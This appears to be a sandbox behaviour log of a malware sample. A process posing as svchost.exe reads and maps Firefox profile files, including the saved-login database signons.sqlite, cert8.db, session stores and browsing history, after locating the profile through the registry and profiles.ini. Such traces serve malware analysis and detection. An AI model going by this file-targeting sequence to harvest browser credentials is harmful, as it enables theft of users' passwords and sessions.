File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\marionette.log, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\mimeTypes.rdf, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\parent.lock, protection = PAGE_READONLY, maximum_size = 0 False 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\permissions.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\places.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\pluginreg.dat, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\prefs.js, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\search.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\secmod.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.bak, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\sessionstore.js, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\signons.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\times.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\urlclassifierkey3.txt, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webapps\webapps.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\webappsstore.sqlite, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\\profiles.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Main False 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US)\Uninstall False 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox\25.0 (en-US) False 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox False 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0, value_name = PathToExe, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 True 1
Fn
Registry Enumerate Keys reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = 0, type = REG_SZ True 1
Fn
Registry Read Value reg_name = HKEY_LOCAL_MACHINE\Software\Mozilla\Mozilla Firefox 25.0\bin, value_name = PathToExe, data = 67 True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\, type = file_attributes True 1
Fn
File Get Info filename = C:\Program Files (x86)\Mozilla Firefox, type = file_attributes True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, desired_access = FILE_READ_ATTRIBUTES True 1
Fn
Ini Enumerate Sections file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, data_out = General, size = 65000 True 1
Fn
Ini Read file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = Path, data_out = Profiles/3y2joh8o.default True 1
Fn
Ini Read file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\profiles.ini, section_name = Profile0, key_name = IsRelative, default_value = 1 True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\addons.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-06-30_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\bookmarkbackups\bookmarks-2017-07-26_5.json, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\cert8.db, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, type = size True 1
Fn
Module Create Mapping module_name = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, protection = PAGE_READONLY, maximum_size = 0 True 1
Fn
Module Map C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\compatibility.ini, process_name = c:\windows\syswow64\svchost.exe, desired_access = FILE_MAP_READ True 1
Fn
Module Unmap process_name = c:\windows\syswow64\svchost.exe True 1
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = FILE_READ_ATTRIBUTES True 2
Fn
File Create filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\aETAdzjz\AppData\Roaming\Mozilla\Firefox\Profiles\3y2joh8o.default\content-prefs.sqlite, type = size True 1
Fn
